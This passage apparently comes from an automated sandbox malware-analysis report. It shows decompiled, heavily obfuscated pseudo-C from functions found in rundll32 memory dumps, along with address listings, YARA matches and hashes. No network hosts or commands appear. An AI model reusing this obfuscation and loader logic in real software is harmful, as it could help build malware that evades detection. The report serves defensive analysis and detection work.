				_v44 = _v44 | 0xc78368a0;
				_v44 = _v44 ^ 0xc78c6ccc;
				while(1) {
					L1:
					_t200 = 0x5c;
					do {
						L2:
						while(_t179 != 0xa00144c) {
							if(_t179 == 0xb19f7ca) {
								_t179 = 0x2b2ed007;
								continue;
							} else {
								if(_t179 == 0xbc9e916) {
									E01FF5AB8(_v20, _v60, _v24, _v28, _t178);
								} else {
									if(_t179 == 0x118767b3) {
										E01FF5AB8(_v68, _v52, _v72, _v76, _t215);
										_t216 =  &(_t216[3]);
										_t179 = 0xbc9e916;
										while(1) {
											L1:
											_t200 = 0x5c;
											goto L2;
										}
									} else {
										if(_t179 == 0x2b2ed007) {
											_t214 =  *0x2011088 + 0x38;
											while( *_t214 != _t200) {
												_t214 = _t214 + 2;
											}
											_t212 = _t214 + 2;
											_t179 = 0x39878866;
											continue;
										} else {
											if(_t179 == 0x39878866) {
												_t176 = E0200340E(_v40, _v80, _t179, _t179, _v44);
												_t178 = _t176;
												_t216 =  &(_t216[3]);
												if(_t176 != 0) {
													_t179 = 0xa00144c;
													while(1) {
														L1:
														_t200 = 0x5c;
														goto L2;
													}
												}
											} else {
												if(_t179 != 0x3a731069) {
													goto L21;
												} else {
													E01FFFF0D(_v48, _v56, _t215);
													_t206 =  !=  ? 1 : _t206;
													_t179 = 0x118767b3;
													while(1) {
														L1:
														_t200 = 0x5c;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L24:
							return _t206;
						}
						_t172 = E02000321(_t178, _v32, _v64, _v36, _t212);
						_t215 = _t172;
						_t216 =  &(_t216[3]);
						if(_t172 == 0) {
							_t179 = 0xbc9e916;
							_t200 = 0x5c;
							goto L21;
						} else {
							_t179 = 0x3a731069;
							goto L1;
						}
						goto L24;
						L21:
					} while (_t179 != 0x1689c33b);
					goto L24;
				}
			}




































                                                                      0x0200434e
                                                                      0x02004351
                                                                      0x0200435b
                                                                      0x02004363
                                                                      0x0200436c
                                                                      0x0200436e
                                                                      0x02004372
                                                                      0x02004376
                                                                      0x0200437e
                                                                      0x02004383
                                                                      0x0200438b
                                                                      0x02004393
                                                                      0x02004398
                                                                      0x020043a0
                                                                      0x020043a8
                                                                      0x020043b3
                                                                      0x020043b8
                                                                      0x020043bc
                                                                      0x020043c1
                                                                      0x020043c9
                                                                      0x020043d1
                                                                      0x020043d6
                                                                      0x020043de
                                                                      0x020043e6
                                                                      0x020043ee
                                                                      0x020043f6
                                                                      0x020043fe
                                                                      0x02004406
                                                                      0x02004414
                                                                      0x02004419
                                                                      0x0200441d
                                                                      0x02004425
                                                                      0x02004434
                                                                      0x02004435
                                                                      0x02004439
                                                                      0x02004441
                                                                      0x02004449
                                                                      0x02004451
                                                                      0x02004459
                                                                      0x02004463
                                                                      0x02004467
                                                                      0x0200446f
                                                                      0x0200447c
                                                                      0x02004480
                                                                      0x02004488
                                                                      0x02004490
                                                                      0x020044a0
                                                                      0x020044a4
                                                                      0x020044ac
                                                                      0x020044b4
                                                                      0x020044bc
                                                                      0x020044c4
                                                                      0x020044c9
                                                                      0x020044d4
                                                                      0x020044d8
                                                                      0x020044e0
                                                                      0x020044e8
                                                                      0x020044f0
                                                                      0x020044f8
                                                                      0x02004508
                                                                      0x0200450c
                                                                      0x02004511
                                                                      0x0200451c
                                                                      0x0200451d
                                                                      0x02004521
                                                                      0x0200452b
                                                                      0x0200452f
                                                                      0x02004533
                                                                      0x0200453b
                                                                      0x02004543
                                                                      0x02004548
                                                                      0x02004550
                                                                      0x02004558
                                                                      0x0200455d
                                                                      0x02004565
                                                                      0x0200456d
                                                                      0x02004575
                                                                      0x0200457d
                                                                      0x0200457d
                                                                      0x0200457f
                                                                      0x02004580
                                                                      0x00000000
                                                                      0x02004580
                                                                      0x02004592
                                                                      0x02004657
                                                                      0x00000000
                                                                      0x02004598
                                                                      0x0200459e
                                                                      0x020046af
                                                                      0x020045a4
                                                                      0x020045aa
                                                                      0x02004645
                                                                      0x0200464a
                                                                      0x0200464d
                                                                      0x0200457d
                                                                      0x0200457d
                                                                      0x0200457f
                                                                      0x00000000
                                                                      0x0200457f
                                                                      0x020045b0
                                                                      0x020045b6
                                                                      0x0200461a
                                                                      0x02004622
                                                                      0x0200461f
                                                                      0x0200461f
                                                                      0x02004627
                                                                      0x0200462a
                                                                      0x00000000
                                                                      0x020045b8
                                                                      0x020045be
                                                                      0x020045f8
                                                                      0x020045fd
                                                                      0x020045ff
                                                                      0x02004604
                                                                      0x0200460a
                                                                      0x0200457d
                                                                      0x0200457d
                                                                      0x0200457f
                                                                      0x00000000
                                                                      0x0200457f
                                                                      0x0200457d
                                                                      0x020045c0
                                                                      0x020045c6
                                                                      0x00000000
                                                                      0x020045cc
                                                                      0x020045d5
                                                                      0x020045e0
                                                                      0x020045e3
                                                                      0x0200457d
                                                                      0x0200457d
                                                                      0x0200457f
                                                                      0x00000000
                                                                      0x0200457f
                                                                      0x0200457d
                                                                      0x020045c6
                                                                      0x020045be
                                                                      0x020045b6
                                                                      0x020045aa
                                                                      0x0200459e
                                                                      0x020046b7
                                                                      0x020046c0
                                                                      0x020046c0
                                                                      0x02004670
                                                                      0x02004675
                                                                      0x02004677
                                                                      0x0200467c
                                                                      0x0200468a
                                                                      0x0200468f
                                                                      0x00000000
                                                                      0x0200467e
                                                                      0x0200467e
                                                                      0x00000000
                                                                      0x0200467e
                                                                      0x00000000
                                                                      0x02004690
                                                                      0x02004690
                                                                      0x00000000
                                                                      0x0200469c

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "6$<a$Sl$n>${fg$|u$o
                                                                      • API String ID: 0-4282296459
                                                                      • Opcode ID: f21b342b501d6933e5575afd9939822380d3693eb732ec4aa776090728751466
                                                                      • Instruction ID: f52bcc8afca7dc020fb2fed6853887ebcb923c7b963920f58d6c569a7d329267
                                                                      • Opcode Fuzzy Hash: f21b342b501d6933e5575afd9939822380d3693eb732ec4aa776090728751466
                                                                      • Instruction Fuzzy Hash: 7A8153715083419FE358CF25D98981FBBF2BBD4358F044A1DF68A962A0D7B58A48CF87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002438C2, Relevance: 8.9, Strings: 7, Instructions: 199COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "6$<a$Sl$n>${fg$|u$o
                                                                      • API String ID: 0-4282296459
                                                                      • Opcode ID: 069db1e7bab7f3b13c41ed17f6fbf742274518a040dc86f1bdc138483ea4e4bf
                                                                      • Instruction ID: 530bc75f7c6c9f94f2ec2eaf015230b957acd5bcc72bf9cf2f09603fa538c312
                                                                      • Opcode Fuzzy Hash: 069db1e7bab7f3b13c41ed17f6fbf742274518a040dc86f1bdc138483ea4e4bf
                                                                      • Instruction Fuzzy Hash: 1D8155715183429FD318CF25C98A41BFBF1FBD4358F144A1EF59A962A0C7B58A49CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFECFE, Relevance: 8.9, Strings: 7, Instructions: 136COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 88%
                                                                      			E01FFECFE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t116;
				signed int _t127;
				void* _t129;
				void* _t138;
				signed int* _t141;

				_push(_a20);
				_push(0xffffffff);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t116);
				_v20 = 0x26c0;
				_t141 =  &(( &_v56)[7]);
				_v20 = _v20 ^ 0x5664ed39;
				_t138 = 0;
				_v20 = _v20 ^ 0x56649557;
				_t129 = 0x182a63aa;
				_v48 = 0x49af;
				_v48 = _v48 + 0x9fa0;
				_v48 = _v48 ^ 0xbfb607f5;
				_v48 = _v48 | 0x3e98ce00;
				_v48 = _v48 ^ 0xbfbeae2a;
				_v44 = 0xe339;
				_v44 = _v44 << 8;
				_v44 = _v44 + 0xffffc89f;
				_v44 = _v44 ^ 0x00e37c5d;
				_v52 = 0x404f;
				_v52 = _v52 >> 0xe;
				_v52 = _v52 * 6;
				_v52 = _v52 | 0x81baeb5b;
				_v52 = _v52 ^ 0x81bad7ee;
				_v24 = 0x7b81;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x000042e8;
				_v56 = 0x974b;
				_v56 = _v56 + 0xec91;
				_v56 = _v56 * 0x5d;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x00026e38;
				_v36 = 0x4dfa;
				_v36 = _v36 * 5;
				_v36 = _v36 + 0xe29b;
				_v36 = _v36 ^ 0x00025248;
				_v40 = 0xa60b;
				_v40 = _v40 * 0x3d;
				_v40 = _v40 + 0xffff1aad;
				_v40 = _v40 ^ 0x0026c01f;
				_v4 = 0xcf11;
				_v4 = _v4 + 0x8c52;
				_v4 = _v4 ^ 0x0001090b;
				_v28 = 0xbe78;
				_v28 = _v28 + 0xc58c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x00002e12;
				_v8 = 0x6ce6;
				_v8 = _v8 + 0x5143;
				_v8 = _v8 ^ 0x0000f5d1;
				_t137 = _v4;
				_v12 = 0xe698;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x000e27c4;
				_v32 = 0x833d;
				_v32 = _v32 << 0xf;
				_v32 = _v32 + 0xb306;
				_v32 = _v32 ^ 0x419f4493;
				_v16 = 0x1ad3;
				_v16 = _v16 << 0xf;
				_v16 = _v16 ^ 0x0d69ea92;
				while(_t129 != 0x182a63aa) {
					if(_t129 == 0x251a2d5f) {
						E01FFF108(_v4, _v28, 0xffffffff, _a4, _a8, _v8, _t129, _v12, _t137, _t138, _v32, _v16);
					} else {
						if(_t129 == 0x2efe34a0) {
							_push(_t129);
							_t138 = E01FF54FB(_t137 + _t137);
							if(_t138 != 0) {
								_t129 = 0x251a2d5f;
								continue;
							}
						} else {
							if(_t129 != 0x34522f7d) {
								L10:
								if(_t129 != 0x226dac5d) {
									continue;
								} else {
								}
							} else {
								_t127 = E01FFF108(_v20, _v48, 0xffffffff, _a4, _a8, _v44, _t129, _v52, 0, 0, _v24, _v56);
								_t137 = _t127;
								_t141 =  &(_t141[0xa]);
								if(_t127 != 0) {
									_t129 = 0x2efe34a0;
									continue;
								}
							}
						}
					}
					return _t138;
				}
				_t129 = 0x34522f7d;
				goto L10;
			}






















                                                                      0x01ffed04
                                                                      0x01ffed08
                                                                      0x01ffed0a
                                                                      0x01ffed0c
                                                                      0x01ffed10
                                                                      0x01ffed14
                                                                      0x01ffed15
                                                                      0x01ffed16
                                                                      0x01ffed1b
                                                                      0x01ffed23
                                                                      0x01ffed26
                                                                      0x01ffed2e
                                                                      0x01ffed30
                                                                      0x01ffed38
                                                                      0x01ffed3d
                                                                      0x01ffed4a
                                                                      0x01ffed52
                                                                      0x01ffed5a
                                                                      0x01ffed62
                                                                      0x01ffed6a
                                                                      0x01ffed72
                                                                      0x01ffed77
                                                                      0x01ffed7f
                                                                      0x01ffed87
                                                                      0x01ffed8f
                                                                      0x01ffed99
                                                                      0x01ffed9d
                                                                      0x01ffeda5
                                                                      0x01ffedad
                                                                      0x01ffedb5
                                                                      0x01ffedba
                                                                      0x01ffedc2
                                                                      0x01ffedca
                                                                      0x01ffedd7
                                                                      0x01ffeddb
                                                                      0x01ffede0
                                                                      0x01ffede8
                                                                      0x01ffedf5
                                                                      0x01ffedf9
                                                                      0x01ffee01
                                                                      0x01ffee09
                                                                      0x01ffee16
                                                                      0x01ffee1a
                                                                      0x01ffee22
                                                                      0x01ffee2a
                                                                      0x01ffee32
                                                                      0x01ffee3a
                                                                      0x01ffee42
                                                                      0x01ffee4a
                                                                      0x01ffee52
                                                                      0x01ffee57
                                                                      0x01ffee5f
                                                                      0x01ffee67
                                                                      0x01ffee6f
                                                                      0x01ffee77
                                                                      0x01ffee7b
                                                                      0x01ffee83
                                                                      0x01ffee88
                                                                      0x01ffee90
                                                                      0x01ffee98
                                                                      0x01ffee9d
                                                                      0x01ffeea5
                                                                      0x01ffeead
                                                                      0x01ffeeb5
                                                                      0x01ffeeba
                                                                      0x01ffeec2
                                                                      0x01ffeecc
                                                                      0x01ffef6e
                                                                      0x01ffeece
                                                                      0x01ffeed4
                                                                      0x01ffef25
                                                                      0x01ffef2b
                                                                      0x01ffef30
                                                                      0x01ffef32
                                                                      0x00000000
                                                                      0x01ffef32
                                                                      0x01ffeed6
                                                                      0x01ffeedc
                                                                      0x01ffef3b
                                                                      0x01ffef41
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffef47
                                                                      0x01ffeede
                                                                      0x01ffef05
                                                                      0x01ffef0a
                                                                      0x01ffef0c
                                                                      0x01ffef11
                                                                      0x01ffef13
                                                                      0x00000000
                                                                      0x01ffef13
                                                                      0x01ffef11
                                                                      0x01ffeedc
                                                                      0x01ffeed4
                                                                      0x01ffef7e
                                                                      0x01ffef7e
                                                                      0x01ffef36
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 9dV$CQ$O@$]|$}/R4$}/R4$B
                                                                      • API String ID: 0-3349067434
                                                                      • Opcode ID: a69a9a61e040f6e4c42a649665921e8b69e3d038fde6fb2fb45657c27c919242
                                                                      • Instruction ID: 3506956c6e5cb28631313e936b3b0d2f336597bfd3a39d201431bef4b34c41ee
                                                                      • Opcode Fuzzy Hash: a69a9a61e040f6e4c42a649665921e8b69e3d038fde6fb2fb45657c27c919242
                                                                      • Instruction Fuzzy Hash: 7B511372409341AFD759CF65C88981BBBE1BFC5768F504A0CF2A5562A1C3BACA49CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023E272, Relevance: 8.9, Strings: 7, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 9dV$CQ$O@$]|$}/R4$}/R4$B
                                                                      • API String ID: 0-3349067434
                                                                      • Opcode ID: 0cc39ec3a623dc590d3e177852770837a0dcb3af5c9f1e4bbfbd1694e5cae751
                                                                      • Instruction ID: 5aa378f73335963e549b4ab0fce9a9ca20a553736523d0d98c8e46b7cc2ca95d
                                                                      • Opcode Fuzzy Hash: 0cc39ec3a623dc590d3e177852770837a0dcb3af5c9f1e4bbfbd1694e5cae751
                                                                      • Instruction Fuzzy Hash: DB5126B1019342AFD758DF61C84981BFBE1BBC8768F504A0CF1A5562A0C3B9CA59DF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFF9BA, Relevance: 7.8, Strings: 6, Instructions: 288COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E01FFF9BA(void* __edx) {
				void* __ecx;
				void* _t230;
				intOrPtr* _t252;
				void* _t254;
				intOrPtr _t260;
				intOrPtr _t261;
				intOrPtr _t266;
				intOrPtr* _t272;
				void* _t274;
				signed int _t276;
				intOrPtr _t305;
				intOrPtr _t307;
				intOrPtr* _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				intOrPtr _t316;
				void* _t318;
				void* _t319;
				void* _t321;

				_t272 =  *((intOrPtr*)(_t318 + 0x80));
				_t308 =  *((intOrPtr*)(_t318 + 0x80));
				_push(_t272);
				_push( *((intOrPtr*)(_t318 + 0x8c)));
				_push(_t308);
				_push(__edx);
				E02002550(_t230);
				 *((intOrPtr*)(_t318 + 0x88)) = 0x1d8a34;
				_t319 = _t318 + 0x14;
				 *((intOrPtr*)(_t319 + 0x78)) = 0x5b8674;
				_t307 = 0;
				 *((intOrPtr*)(_t319 + 0x7c)) = 0;
				 *(_t319 + 0x28) = 0xb766;
				_t274 = 0x3039966c;
				_t309 = 0x72;
				 *(_t319 + 0x2c) =  *(_t319 + 0x28) / _t309;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) << 3;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) << 0xb;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0x0066fe1e;
				 *(_t319 + 0x28) = 0x26e;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) ^ 0x211d89c8;
				_t310 = 0x74;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) / _t310;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) >> 4;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) ^ 0x000485a3;
				 *(_t319 + 0x6c) = 0xe762;
				 *(_t319 + 0x6c) =  *(_t319 + 0x6c) >> 1;
				 *(_t319 + 0x6c) =  *(_t319 + 0x6c) ^ 0x00005f9f;
				 *(_t319 + 0x68) = 0xaff4;
				 *(_t319 + 0x68) =  *(_t319 + 0x68) + 0x7828;
				 *(_t319 + 0x68) =  *(_t319 + 0x68) ^ 0x0001439f;
				 *(_t319 + 0x34) = 0xcb25;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffffb8d3;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) >> 0xa;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffffe26e;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) ^ 0xffff9e5a;
				 *(_t319 + 0x30) = 0xc32b;
				 *(_t319 + 0x30) =  *(_t319 + 0x30) | 0xe65bb1cf;
				_t311 = 0x26;
				 *(_t319 + 0x2c) =  *(_t319 + 0x30) / _t311;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0xfcdd71a1;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0xfad2c55c;
				 *(_t319 + 0x44) = 0x3fe0;
				 *(_t319 + 0x44) =  *(_t319 + 0x44) + 0xffff9bb9;
				 *(_t319 + 0x44) =  *(_t319 + 0x44) ^ 0x68f0e63f;
				 *(_t319 + 0x44) =  *(_t319 + 0x44) ^ 0x970f0c5a;
				 *(_t319 + 0x60) = 0x8a37;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) << 6;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) ^ 0x0022b94e;
				 *(_t319 + 0x34) = 0x571;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) >> 0xe;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffff24df;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) ^ 0xffff3e5c;
				 *(_t319 + 0x4c) = 0x95d9;
				 *(_t319 + 0x4c) =  *(_t319 + 0x4c) | 0xe7fe2ada;
				 *(_t319 + 0x4c) =  *(_t319 + 0x4c) ^ 0xe7fea73a;
				 *(_t319 + 0x40) = 0x73df;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) * 0x6b;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) + 0x4d5f;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) ^ 0x0030fb20;
				 *(_t319 + 0x20) = 0xe6ed;
				 *(_t319 + 0x20) =  *(_t319 + 0x20) >> 7;
				 *(_t319 + 0x20) =  *(_t319 + 0x20) * 0x63;
				_t312 = 0x6c;
				 *(_t319 + 0x24) =  *(_t319 + 0x20) / _t312;
				 *(_t319 + 0x24) =  *(_t319 + 0x24) ^ 0x000007c6;
				 *(_t319 + 0x40) = 0xf0c6;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) + 0x590f;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) << 2;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) ^ 0x0005396a;
				 *(_t319 + 0x60) = 0x3771;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) << 0xe;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) ^ 0x0ddc1ff2;
				 *(_t319 + 0x5c) = 0x9a5a;
				 *(_t319 + 0x5c) =  *(_t319 + 0x5c) >> 6;
				 *(_t319 + 0x5c) =  *(_t319 + 0x5c) ^ 0x000002fa;
				 *(_t319 + 0x58) = 0x55e2;
				 *(_t319 + 0x58) =  *(_t319 + 0x58) ^ 0xef99e16a;
				 *(_t319 + 0x58) =  *(_t319 + 0x58) ^ 0xef99b4e6;
				 *(_t319 + 0x18) = 0xddcf;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) + 0xffffd9e8;
				_t313 = 0x76;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) / _t313;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0xfe0ce3a4;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0xfe0c9dd3;
				 *(_t319 + 0x54) = 0x5bdd;
				 *(_t319 + 0x54) =  *(_t319 + 0x54) + 0xffd3;
				 *(_t319 + 0x54) =  *(_t319 + 0x54) ^ 0x000145b1;
				 *(_t319 + 0x3c) = 0x44f;
				_t314 = 0x66;
				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) / _t314;
				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) ^ 0x4a8254b5;
				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) ^ 0x4a825342;
				 *(_t319 + 0x14) = 0xc963;
				 *(_t319 + 0x14) =  *(_t319 + 0x14) + 0x81df;
				_t315 = 0x4e;
				 *(_t319 + 0x10) =  *(_t319 + 0x14) * 0x2c;
				 *(_t319 + 0x10) =  *(_t319 + 0x10) | 0x15242836;
				 *(_t319 + 0x10) =  *(_t319 + 0x10) ^ 0x153cd105;
				 *(_t319 + 0x1c) = 0xede;
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) | 0xa2b3614c;
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) * 0x5a;
				_t316 =  *((intOrPtr*)(_t319 + 0x70));
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) / _t315;
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) ^ 0x00a7e5fc;
				 *(_t319 + 0x18) = 0x965c;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) << 8;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) * 0x27;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) + 0xc4fd;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0x16e8bc96;
				while(1) {
					_t251 =  *((intOrPtr*)(_t319 + 0x48));
					while(1) {
						L2:
						_t321 = _t274 - 0x239299c3;
						if(_t321 > 0) {
							break;
						}
						if(_t321 == 0) {
							E02000FE4(_t274,  *(_t319 + 0x6c));
							_t274 = 0xabf6969;
							while(1) {
								_t251 =  *((intOrPtr*)(_t319 + 0x48));
								goto L2;
							}
						}
						if(_t274 == 0x6178099) {
							_t274 = 0x2e2e6a11;
							continue;
						}
						if(_t274 == 0xa9c22c2) {
							if( *((intOrPtr*)(_t272 + 4)) < 0x74) {
								L30:
								return _t307;
							}
							_t274 = 0x6178099;
							continue;
						}
						if(_t274 == 0xabf6969) {
							if(_t307 == 0) {
								E01FFDE81( *(_t319 + 0x6c),  *_t308,  *((intOrPtr*)(_t319 + 0x64)));
							}
							goto L30;
						}
						if(_t274 == 0xfdd9a18) {
							_push(_t274);
							_t266 =  *0x2010400; // 0x0
							E01FF55B6( *((intOrPtr*)(_t319 + 0x74)),  *((intOrPtr*)(_t319 + 0x70)),  *((intOrPtr*)(_t319 + 0x94)),  *((intOrPtr*)(_t319 + 0x8c)),  *((intOrPtr*)(_t266 + 0x18)),  *(_t319 + 0x2c), _t274, _t274,  *(_t319 + 0x5c),  *(_t319 + 0x40),  *(_t319 + 0x14));
							_t319 = _t319 + 0x28;
							_t307 =  !=  ? 1 : _t307;
							_t274 = 0x239299c3;
							while(1) {
								_t251 =  *((intOrPtr*)(_t319 + 0x48));
								goto L2;
							}
						}
						if(_t274 != 0x22b04821) {
							L26:
							if(_t274 == 0x26ae1a3c) {
								goto L30;
							}
							while(1) {
								_t251 =  *((intOrPtr*)(_t319 + 0x48));
								goto L2;
							}
						}
						E01FF6374( *((intOrPtr*)(_t319 + 0x38)),  *_t308, _t316, _t251,  *(_t319 + 0x4c));
						_t319 = _t319 + 0xc;
						_t274 = 0x33e31eb3;
						while(1) {
							_t251 =  *((intOrPtr*)(_t319 + 0x48));
							goto L2;
						}
					}
					if(_t274 == 0x2c8b1a44) {
						_t252 =  *0x2010400; // 0x0
						_t254 = E01FF72A4( *(_t319 + 0x44), _t319 + 0x70,  *(_t319 + 0x3c),  *((intOrPtr*)(_t319 + 0x50)), _t274,  *((intOrPtr*)(_t319 + 0x64)),  *_t252);
						_t319 = _t319 + 0x18;
						if(_t254 == 0) {
							_t274 = 0xabf6969;
							goto L26;
						}
						_t274 = 0x22b04821;
						while(1) {
							_t251 =  *((intOrPtr*)(_t319 + 0x48));
							goto L2;
						}
					}
					if(_t274 == 0x2e2e6a11) {
						 *((intOrPtr*)(_t308 + 4)) =  *((intOrPtr*)(_t272 + 4)) - 0x74;
						_push(_t274);
						_t260 = E01FF54FB( *((intOrPtr*)(_t308 + 4)));
						 *_t308 = _t260;
						if(_t260 == 0) {
							goto L30;
						}
						_t261 =  *_t272;
						_t274 = 0x2c8b1a44;
						 *((intOrPtr*)(_t319 + 0x70)) = _t261;
						_t251 = _t261 + 0x74;
						 *((intOrPtr*)(_t319 + 0x48)) = _t261 + 0x74;
						_t316 =  *((intOrPtr*)(_t272 + 4)) - 0x74;
						goto L2;
					}
					if(_t274 == 0x3039966c) {
						_t274 = 0xa9c22c2;
						goto L2;
					}
					if(_t274 != 0x33e31eb3) {
						goto L26;
					}
					_push(_t274);
					_t305 =  *0x2010400; // 0x0
					_t276 =  *(_t319 + 0x58);
					E01FF4648(_t276,  *((intOrPtr*)(_t305 + 0x10)),  *((intOrPtr*)(_t319 + 0x88)), _t308 + 4,  *(_t319 + 0x34),  *(_t319 + 0x4c), _t274,  *((intOrPtr*)(_t319 + 0x64)),  *_t308);
					_t319 = _t319 + 0x20;
					asm("sbb ecx, ecx");
					_t274 = (_t276 & 0xec4b0055) + 0x239299c3;
				}
			}



























                                                                      0x01fff9be
                                                                      0x01fff9c7
                                                                      0x01fff9cf
                                                                      0x01fff9d0
                                                                      0x01fff9d7
                                                                      0x01fff9d8
                                                                      0x01fff9da
                                                                      0x01fff9df
                                                                      0x01fff9ea
                                                                      0x01fff9ed
                                                                      0x01fff9f5
                                                                      0x01fff9f7
                                                                      0x01fff9fd
                                                                      0x01fffa05
                                                                      0x01fffa10
                                                                      0x01fffa15
                                                                      0x01fffa1b
                                                                      0x01fffa20
                                                                      0x01fffa25
                                                                      0x01fffa2d
                                                                      0x01fffa35
                                                                      0x01fffa41
                                                                      0x01fffa46
                                                                      0x01fffa4c
                                                                      0x01fffa51
                                                                      0x01fffa59
                                                                      0x01fffa61
                                                                      0x01fffa65
                                                                      0x01fffa6d
                                                                      0x01fffa75
                                                                      0x01fffa7d
                                                                      0x01fffa85
                                                                      0x01fffa8d
                                                                      0x01fffa95
                                                                      0x01fffa9a
                                                                      0x01fffaa2
                                                                      0x01fffaaa
                                                                      0x01fffab2
                                                                      0x01fffabe
                                                                      0x01fffac1
                                                                      0x01fffac5
                                                                      0x01fffacd
                                                                      0x01fffad5
                                                                      0x01fffadd
                                                                      0x01fffae5
                                                                      0x01fffaed
                                                                      0x01fffaf5
                                                                      0x01fffafd
                                                                      0x01fffb02
                                                                      0x01fffb0a
                                                                      0x01fffb12
                                                                      0x01fffb17
                                                                      0x01fffb1f
                                                                      0x01fffb27
                                                                      0x01fffb2f
                                                                      0x01fffb37
                                                                      0x01fffb3f
                                                                      0x01fffb4c
                                                                      0x01fffb50
                                                                      0x01fffb58
                                                                      0x01fffb60
                                                                      0x01fffb68
                                                                      0x01fffb72
                                                                      0x01fffb7e
                                                                      0x01fffb83
                                                                      0x01fffb89
                                                                      0x01fffb91
                                                                      0x01fffb99
                                                                      0x01fffba1
                                                                      0x01fffba6
                                                                      0x01fffbae
                                                                      0x01fffbb6
                                                                      0x01fffbbb
                                                                      0x01fffbc3
                                                                      0x01fffbcb
                                                                      0x01fffbd0
